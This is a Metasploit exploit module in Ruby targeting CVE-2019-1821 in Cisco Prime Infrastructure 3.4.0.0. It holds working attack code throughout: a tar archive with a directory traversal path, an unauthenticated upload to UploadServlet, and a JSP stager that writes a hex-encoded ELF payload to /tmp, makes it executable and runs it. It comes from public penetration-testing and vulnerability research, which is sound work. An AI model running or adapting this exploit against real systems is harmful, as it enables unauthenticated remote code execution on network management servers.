## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability', 'Description' => %q{ This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps directory, and gain arbitrary remote code execution. Note that authentication is not required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Steven Seeley', # Original discovery, PoC 'sinn3r' # Metasploit module ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Cisco Prime Infrastructure 3.4.0.0', { } ] ], 'References' => [ ['CVE', '2019-1821'], ['URL', 'https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html'], ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce'], ['URL', 'https://srcincite.io/advisories/src-2019-0034/'], ['URL', 'https://srcincite.io/pocs/src-2019-0034.py.txt'] ], 'DefaultOptions' => { 'RPORT' => 8082, 'SSL' => true, }, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Privileged' => false, 'DisclosureDate' => 'May 15 2019', 'DefaultTarget' => 0)) register_options( [ OptPort.new('WEBPORT', [true, 'Cisco Prime Infrastructure web interface', 443]), OptString.new('TARGETURI', [true, 'The route for Cisco Prime Infrastructure web interface', '/']) ]) end class CPITarArchive attr_reader :data attr_reader :jsp_name attr_reader :tar_name attr_reader :stager attr_reader :length def initialize(name, stager) @jsp_name = "#{name}.jsp" @tar_name = "#{name}.tar" @stager = stager @data = make @length = data.length end def make data = '' path = "../../opt/CSCOlumos/tomcat/webapps/ROOT/#{jsp_name}" tar = StringIO.new Rex::Tar::Writer.new(tar) do |t| t.add_file(path, 0644) do |f| f.write(stager) end end tar.seek(0) data = tar.read tar.close data end end def check res = send_request_cgi({ 'rport' => datastore['WEBPORT'], 'SSL' => true, 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'webacs', 'pages', 'common', 'login.jsp') }) unless res vprint_error('No response from the server') return CheckCode::Unknown end if res.code == 200 && res.headers['Server'] && res.headers['Server'] == 'Prime' return CheckCode::Detected end CheckCode::Safe end def get_jsp_stager(out_file, bin_data) # For some reason, some of the bytes tend to get lost at the end. # Not really sure why, but some extra bytes are added to ensure the integrity # of the code. This file will get deleted during cleanup anyway. %Q|<%@ page import="java.io.*" %> <% String data = "#{Rex::Text.to_hex(bin_data, '')}"; FileOutputStream outputstream = new FileOutputStream("#{out_file}"); int numbytes = data.length(); byte[] bytes = new byte[numbytes/2]; for (int counter = 0; counter < numbytes; counter += 2) { char char1 = (char) data.charAt(counter); char char2 = (char) data.charAt(counter + 1); int comb = Character.digit(char1, 16) & 0xff; comb <<= 4; comb += Character.digit(char2, 16) & 0xff; bytes[counter/2] = (byte)comb; } outputstream.write(bytes); outputstream.close(); try { Runtime.getRuntime().exec("chmod +x #{out_file}"); Runtime.getRuntime().exec("#{out_file}"); } catch (IOException exp) {} %>#{Rex::Text.rand_text_alpha(30)}| end def make_tar elf_name = "/tmp/#{Rex::Text.rand_text_alpha(10)}.bin" register_file_for_cleanup(elf_name) elf = generate_payload_exe(code: payload.encoded) jsp_stager = get_jsp_stager(elf_name, elf) tar_name = Rex::Text.rand_text_alpha(10) register_file_for_cleanup("apache-tomcat-8.5.16/webapps/ROOT/#{tar_name}.jsp") CPITarArchive.new(tar_name, jsp_stager) end def execute_payload(tar) # Once executed, we are at: # /opt/CSCOlumos send_request_cgi({ 'rport' => datastore['WEBPORT'], 'SSL' => true, 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, tar.jsp_name) }) end def upload_tar(tar) post_data = Rex::MIME::Message.new post_data.add_part(tar.data, nil, nil, "form-data; name=\"files\"; filename=\"#{tar.tar_name}\"") # The file gets uploaded to this path on the server: # /opt/CSCOlumos/apache-tomcat-8.5.16/webapps/ROOT/tar_name.jsp res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'servlet', 'UploadServlet'), 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => { 'Destination-Dir' => 'tftpRoot', 'Compressed-Archive' => 'false', 'Primary-IP' => '127.0.0.1', 'Filecount' => '1', 'Filename' => tar.tar_name, 'FileSize' => tar.length } }) (res && res.code == 200) end def exploit tar = make_tar print_status("Uploading tar file (#{tar.length} bytes)") if upload_tar(tar) print_status('Executing JSP stager...') execute_payload(tar) else print_status("Failed to upload #{tar.tar_name}") end end end